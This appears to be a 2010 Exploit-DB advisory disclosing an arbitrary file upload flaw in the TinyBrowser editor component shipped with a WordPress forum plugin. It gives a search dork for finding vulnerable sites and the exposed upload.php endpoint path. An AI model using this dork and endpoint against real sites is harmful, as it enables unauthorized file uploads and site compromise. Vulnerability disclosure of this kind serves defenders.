WordPress Plugin TinyBrowser - Arbitrary File Upload

EDB-ID:

12692

CVE:

N/A


Author:

Ra3cH

Type:

webapps


Platform:

PHP

Date:

2010-05-22


************************************************************
** 	 TinyBrowser Remote File upload Vulnerability
************************************************************
**  Prodcut:		TinyBrowser   
**  Home   : 		www.dz4all.com/cc
**  Vunlerability :		Remote File upload
**  Risk  :		High
**  Dork : 		inurl:"tinybrowser.php?"
************************************************************
** Discovred by:	Ra3cH
** From	       :	Algeria
** Contact     : 	e51@hotmail.fr
** *********************************************************
************************************************************
**  Exploit:
**  http://[PATH]/tinybrowser/upload.php?type=
**   
**  
************************************************************
**  Exemple:
**  http://[site]/wp-content/plugins/simple-forum/editors/tinymce/plugins/tinybrowser/upload.php?type=
**
**
**
************************************************************ 
**  ** Greetz to :     ALLAH
**         All Members of  http://www.DZ4All.cOm/Cc
**          And My BrOther AnGeL25dZ & yasMouh & ProToCoL & Mr.Benladen & T O X ! N £ & n2n & 
***********************************************************